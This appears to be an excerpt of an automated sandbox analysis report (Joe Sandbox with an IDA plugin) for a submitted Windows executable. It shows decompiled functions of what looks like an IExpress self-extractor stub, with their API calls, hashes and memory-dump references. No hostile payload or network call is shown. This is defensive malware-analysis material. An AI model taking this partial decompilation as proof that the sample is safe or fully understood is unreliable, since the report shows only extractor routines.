                                                                        • Opcode Fuzzy Hash: 8661249794681c17089e7e3c53711821824cea660553771cf7ed45913cc2b07c
                                                                        • Instruction Fuzzy Hash: 7891E4B3B022249BDB378B24EC91BEA77B4EB45304F1600ABD8499B341D7708F84DB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E003D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                        				struct HRSRC__* _t6;
                                                                        				void* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				int _t24;
                                                                        
                                                                        				_t23 =  *0x3d9a3c; // 0x3d0000
                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                        				if(_t6 == 0) {
                                                                        					L6:
                                                                        					E003D44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                        					_t5 =  &_a16; // 0x3d2ee8
                                                                        					_t24 =  *_t5;
                                                                        				} else {
                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						if(_a12 != 0) {
                                                                        							_push(_a12);
                                                                        						} else {
                                                                        							_push(0);
                                                                        						}
                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                        						FreeResource(_t21);
                                                                        						if(_t24 == 0xffffffff) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t24;
                                                                        			}








                                                                        APIs
                                                                        • FindResourceA.KERNEL32(003D0000,000007D6,00000005), ref: 003D652A
                                                                        • LoadResource.KERNEL32(003D0000,00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003D6538
                                                                        • DialogBoxIndirectParamA.USER32(003D0000,00000000,00000547,003D19E0,00000000), ref: 003D6557
                                                                        • FreeResource.KERNEL32(00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003D6560
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                        • String ID: .=
                                                                        • API String ID: 1214682469-3076444577
                                                                        • Opcode ID: 1fffb9080120cb46977667a798d3fd2526f1ce1d8a8776ede1238c7dd425f186
                                                                        • Instruction ID: 8084eb097a01040e239560d2dc750dd8d740ad824c2703eb1e22c5c774576ce1
                                                                        • Opcode Fuzzy Hash: 1fffb9080120cb46977667a798d3fd2526f1ce1d8a8776ede1238c7dd425f186
                                                                        • Instruction Fuzzy Hash: 93012673101605BBCB135FA9BC09DBB7B6DEB8A360F010127FE2093250D7719D5086A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E003D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				signed int _t9;
                                                                        				signed char _t14;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				void* _t18;
                                                                        				CHAR* _t26;
                                                                        				void* _t27;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t18 = __ebx;
                                                                        				_t9 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t9 ^ _t28;
                                                                        				_push(__ecx);
                                                                        				E003D1781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        				_t26 = "advpack.dll";
                                                                        				E003D658A( &_v268, 0x104, _t26);
                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                        					_t15 = LoadLibraryA(_t26);
                                                                        				} else {
                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                        				}
                                                                        				return E003D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                        			}














                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003D64DF
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003D64F9
                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003D6502
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AttributesFile
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                        • API String ID: 438848745-726598030
                                                                        • Opcode ID: 246cc580f5d4ef9154277b431a0e66a37f284814fcf299aaeba911c433db4089
                                                                        • Instruction ID: 945022d7cad2c735eb3cb297e1b167ea5a9be2d6ca83d164a197cc0591248777
                                                                        • Opcode Fuzzy Hash: 246cc580f5d4ef9154277b431a0e66a37f284814fcf299aaeba911c433db4089
                                                                        • Instruction Fuzzy Hash: 5E01D172A00108ABDB12DB64FC4AEEE737DEB51311F500197F595962D0DFB0AECA8A51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E003D4169(void* __eflags) {
                                                                        				int _t18;
                                                                        				void* _t21;
                                                                        
                                                                        				_t20 = E003D468F("FINISHMSG", 0, 0);
                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                        				if(_t21 != 0) {
                                                                        					if(E003D468F("FINISHMSG", _t21, _t20) != 0) {
                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                        							L7:
                                                                        							return LocalFree(_t21);
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0x40);
                                                                        						_push(0);
                                                                        						_push(_t21);
                                                                        						_t18 = 0x3e9;
                                                                        						L6:
                                                                        						E003D44B9(0, _t18);
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0x10);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t18 = 0x4b1;
                                                                        					goto L6;
                                                                        				}
                                                                        				return E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        			}






                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003D30B4), ref: 003D4189
                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003D30B4), ref: 003D41E7
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$FINISHMSG
                                                                        • API String ID: 3507850446-3091758298
                                                                        • Opcode ID: 177d5653225be3a6abf36a0b280c4e6f4923ab716b0fb9d562f4fe8e64217676
                                                                        • Instruction ID: 878de875e4707e3e455fc99bd1b14f8017da6b9c1c0c41485132ce70c7f4fddc
                                                                        • Opcode Fuzzy Hash: 177d5653225be3a6abf36a0b280c4e6f4923ab716b0fb9d562f4fe8e64217676
                                                                        • Instruction Fuzzy Hash: 9301ADA73002143BE3271A66BC86F7B629EDB94795F014027B706E57809A78CC414175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E003D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v520;
                                                                        				void* __esi;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				void* _t33;
                                                                        				struct HWND__* _t34;
                                                                        				signed int _t35;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t11 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t11 ^ _t35;
                                                                        				_t34 = _a4;
                                                                        				_t14 = _a8 - 0x110;
                                                                        				if(_t14 == 0) {
                                                                        					_t32 = GetDesktopWindow();
                                                                        					E003D43D0(_t34, _t15);
                                                                        					_v520 = 0;
                                                                        					LoadStringA( *0x3d9a3c, _a16,  &_v520, 0x200);
                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                        					MessageBeep(0xffffffff);
                                                                        					goto L6;
                                                                        				} else {
                                                                        					if(_t14 != 1) {
                                                                        						L4:
                                                                        						_t23 = 0;
                                                                        					} else {
                                                                        						_t32 = _a12;
                                                                        						if(_t32 - 0x83d > 1) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							EndDialog(_t34, _t32);
                                                                        							L6:
                                                                        							_t23 = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                        			}














                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 003D1A18
                                                                        • GetDesktopWindow.USER32 ref: 003D1A24
                                                                        • LoadStringA.USER32(?,?,00000200), ref: 003D1A4F
                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 003D1A62
                                                                        • MessageBeep.USER32(000000FF), ref: 003D1A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1273765764-0
                                                                        • Opcode ID: a7444c8bebd7d94c3eae1382e08e2e2f0a8994f806e8b8e23e90853c0269f39b
                                                                        • Instruction ID: d5e9a166a704e36b045859964ababa68a0b33f96e65ddaf4395ad14bd8c37e3c
                                                                        • Opcode Fuzzy Hash: a7444c8bebd7d94c3eae1382e08e2e2f0a8994f806e8b8e23e90853c0269f39b
                                                                        • Instruction Fuzzy Hash: 2011A532502119AFDB12EF64FE09BAE77BCEF49300F104156F91297291DA309F11CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E003D63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				long _v272;
                                                                        				void* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t15;
                                                                        				long _t28;
                                                                        				struct _OVERLAPPED* _t37;
                                                                        				void* _t39;
                                                                        				signed int _t40;
                                                                        
                                                                        				_t15 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t15 ^ _t40;
                                                                        				_v272 = _v272 & 0x00000000;
                                                                        				_push(__ecx);
                                                                        				_v276 = _a16;
                                                                        				_t37 = 1;
                                                                        				E003D1781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        				E003D658A( &_v268, 0x104, _a12);
                                                                        				_t28 = 0;
                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                        				if(_t39 != 0xffffffff) {
                                                                        					_t28 = _a4;
                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                        						 *0x3d9124 = 0x80070052;
                                                                        						_t37 = 0;
                                                                        					}
                                                                        					CloseHandle(_t39);
                                                                        				} else {
                                                                        					 *0x3d9124 = 0x80070052;
                                                                        					_t37 = 0;
                                                                        				}
                                                                        				return E003D6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                        			}
















                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D642D
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D645B
                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D647A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 003D63EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleWrite
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 1065093856-1955631000
                                                                        • Opcode ID: 9c74b9d5a4e5febb9515e163ddd87d5f44c2353506781a968351b9ad34c27f86
                                                                        • Instruction ID: 7b60223d063a43b966898803be4a33e3da0d0d95fc8f3349b8a775092c8016d7
                                                                        • Opcode Fuzzy Hash: 9c74b9d5a4e5febb9515e163ddd87d5f44c2353506781a968351b9ad34c27f86
                                                                        • Instruction Fuzzy Hash: AA21C372A01218ABD712DF25EC86FEA737CEB45314F00416BF595A7280DAB06D848FA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D47E0(intOrPtr* __ecx) {
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t9;
                                                                        				void* _t11;
                                                                        				void* _t19;
                                                                        				intOrPtr* _t22;
                                                                        				void _t24;
                                                                        				struct HWND__* _t25;
                                                                        				struct HWND__* _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t33 = __ecx;
                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                        				if(_t34 != 0) {
                                                                        					_t22 = _t33;
                                                                        					_t27 = _t22 + 1;
                                                                        					do {
                                                                        						_t6 =  *_t22;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t6 != 0);
                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                        					 *_t34 = _t24;
                                                                        					if(_t24 != 0) {
                                                                        						_t28 = _t33;
                                                                        						_t19 = _t28 + 1;
                                                                        						do {
                                                                        							_t9 =  *_t28;
                                                                        							_t28 = _t28 + 1;
                                                                        						} while (_t9 != 0);
                                                                        						E003D1680(_t24, _t28 - _t19 + 1, _t33);
                                                                        						_t11 =  *0x3d91e0; // 0x2b58300
                                                                        						 *(_t34 + 4) = _t11;
                                                                        						 *0x3d91e0 = _t34;
                                                                        						return 1;
                                                                        					}
                                                                        					_t25 =  *0x3d8584; // 0x0
                                                                        					E003D44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                        					LocalFree(_t34);
                                                                        					L2:
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 =  *0x3d8584; // 0x0
                                                                        				E003D44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                        				goto L2;
                                                                        			}
















                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,003D4E6F), ref: 003D47EA
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 003D4823
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 003D4847
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 003D4851
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 359063898-1955631000
                                                                        • Opcode ID: 36130f00c282f9bf7f31c6311e0f523181ef226fd04f54eb5659c8832edb8a20
                                                                        • Instruction ID: 3fa7bcc4a6e9b2eea0df313bd05981766a6f3f5e3c4dafa531683250dc2077c4
                                                                        • Opcode Fuzzy Hash: 36130f00c282f9bf7f31c6311e0f523181ef226fd04f54eb5659c8832edb8a20
                                                                        • Instruction Fuzzy Hash: 4D1102766056426FD7178F24FC18F723B6EEB85340F04851BEA829B341DA369C068660
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D3680(void* __ecx) {
                                                                        				void* _v8;
                                                                        				struct tagMSG _v36;
                                                                        				int _t8;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t16 = 0;
                                                                        				while(1) {
                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                        					if(_t8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						do {
                                                                        							if(_v36.message != 0x12) {
                                                                        								DispatchMessageA( &_v36);
                                                                        							} else {
                                                                        								_t16 = 1;
                                                                        							}
                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                        						} while (_t8 != 0);
                                                                        						if(_t16 == 0) {
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t8;
                                                                        			}








                                                                        APIs
                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003D369F
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003D36B2
                                                                        • DispatchMessageA.USER32(?), ref: 003D36CB
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003D36DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                        • String ID:
                                                                        • API String ID: 2776232527-0
                                                                        • Opcode ID: 45d5bd70e35698eabe3b134a88c4e7c2a455df76b31ba6e0096f88b5db1a9f22
                                                                        • Instruction ID: de78255a7aee21a43cd4c059627c1e6d9914de6265dec7f8cd48792a42c69147
                                                                        • Opcode Fuzzy Hash: 45d5bd70e35698eabe3b134a88c4e7c2a455df76b31ba6e0096f88b5db1a9f22
                                                                        • Instruction Fuzzy Hash: 3A01677390125577DB314BA67D88EEBBB7CEBC6B10F15011BF915E2280D561CA44C671
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E003D65E8(char* __ecx) {
                                                                        				char _t3;
                                                                        				char _t10;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				char* _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				_t15 = __ecx;
                                                                        				_t14 =  &(__ecx[1]);
                                                                        				_t10 = 0;
                                                                        				do {
                                                                        					_t3 =  *_t12;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t3 != 0);
                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                        					if(_t16 <= _t15) {
                                                                        						break;
                                                                        					}
                                                                        					if( *_t16 == 0x5c) {
                                                                        						L7:
                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						 *_t16 = _t10;
                                                                        						_t10 = 1;
                                                                        					} else {
                                                                        						_push(_t16);
                                                                        						continue;
                                                                        					}
                                                                        					L11:
                                                                        					return _t10;
                                                                        				}
                                                                        				if( *_t16 == 0x5c) {
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L11;
                                                                        			}










                                                                        APIs
                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,003D2B33), ref: 003D6602
                                                                        • CharPrevA.USER32(?,00000000), ref: 003D6612
                                                                        • CharPrevA.USER32(?,00000000), ref: 003D6629
                                                                        • CharNextA.USER32(00000000), ref: 003D6635
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Prev$Next
                                                                        • String ID:
                                                                        • API String ID: 3260447230-0
                                                                        • Opcode ID: 4a24ef0a05e4cd57727a777e180b5ab34c778e839b6dea8cf30f2738e1937318
                                                                        • Instruction ID: 2ef1a99d4bbe5c42267eeb2a461ff186eb8421d989a4f60190b95a9e990d6d8b
                                                                        • Opcode Fuzzy Hash: 4a24ef0a05e4cd57727a777e180b5ab34c778e839b6dea8cf30f2738e1937318
                                                                        • Instruction Fuzzy Hash: F6F028334059506EE7331F28BC888BBBF9CCF8B354F2A01AFE4E282201D6154E468661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D69B0() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr* _t5;
                                                                        				void* _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        
                                                                        				 *0x3d81f8 = E003D6C70();
                                                                        				__set_app_type(E003D6FBE(2));
                                                                        				 *0x3d88a4 =  *0x3d88a4 | 0xffffffff;
                                                                        				 *0x3d88a8 =  *0x3d88a8 | 0xffffffff;
                                                                        				_t4 = __p__fmode();
                                                                        				_t11 =  *0x3d8528; // 0x0
                                                                        				 *_t4 = _t11;
                                                                        				_t5 = __p__commode();
                                                                        				_t12 =  *0x3d851c; // 0x0
                                                                        				 *_t5 = _t12;
                                                                        				_t6 = E003D7000();
                                                                        				if( *0x3d8000 == 0) {
                                                                        					__setusermatherr(E003D7000);
                                                                        				}
                                                                        				E003D71EF(_t6);
                                                                        				return 0;
                                                                        			}









                                                                        APIs
                                                                          • Part of subcall function 003D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 003D6FC5
                                                                        • __set_app_type.MSVCRT ref: 003D69C2
                                                                        • __p__fmode.MSVCRT ref: 003D69D8
                                                                        • __p__commode.MSVCRT ref: 003D69E6
                                                                        • __setusermatherr.MSVCRT ref: 003D6A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: 8dea93e1adc27aefea82c9e9ec284f48f8f8475132a30ee6e6772a6b97d1912e
                                                                        • Instruction ID: 7806fd8220ba80f8eaa06d1a26b59074919f1b7b5b9b3c91d533bfa462bdaa33
                                                                        • Opcode Fuzzy Hash: 8dea93e1adc27aefea82c9e9ec284f48f8f8475132a30ee6e6772a6b97d1912e
                                                                        • Instruction Fuzzy Hash: 3FF01CB210A7019FC717AB35FE0A6083B69FB05331F104A0BE4A18A3F1DF3AA554CA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
